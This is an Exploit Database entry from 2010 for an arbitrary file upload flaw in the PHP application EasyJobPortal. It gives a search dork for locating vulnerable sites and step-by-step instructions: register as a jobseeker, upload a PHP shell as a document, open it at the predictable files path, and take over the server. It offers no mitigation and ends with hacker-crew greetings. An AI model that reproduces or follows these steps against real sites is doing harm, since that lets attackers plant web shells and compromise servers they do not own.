EasyJobPortal - Arbitrary File Upload

EDB-ID:

15516

CVE:

N/A


Author:

MeGo

Type:

webapps


Platform:

PHP

Date:

2010-11-13


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

#################################################################
# Exploit :  EasyJobPortal << upload shell

# Date    :  13-11-2010

# Author  :  MeGo

# Version :  n/a

# DorK    :  inurl:jobseeker_register.php  

# Home    :  WwW.P0C.cC/vb

# Email   :  EG5-@hotmail.com , M3GO@live.com

# Vendor  :  http://www.easyjobportal.com
################################################################# 

[+] Exploit

[1] Register Frist ..
[-] http://localhost/path/jobseeker_register.php

[2] Create New Upload Your Shell.php ..
[-] http://localhost/path/jobseeker_document.php

[3] To See Shell Edit Your Document
[-] http://localhost/path/files/document/1/Shell.php

[4] Now Your R00T Box

[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]

Great 2 : P0C Member , Roots , V4-Team Members , Roots

SGreatz : X-Father , Mo7a , My Keybord :D

./D0n3

[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]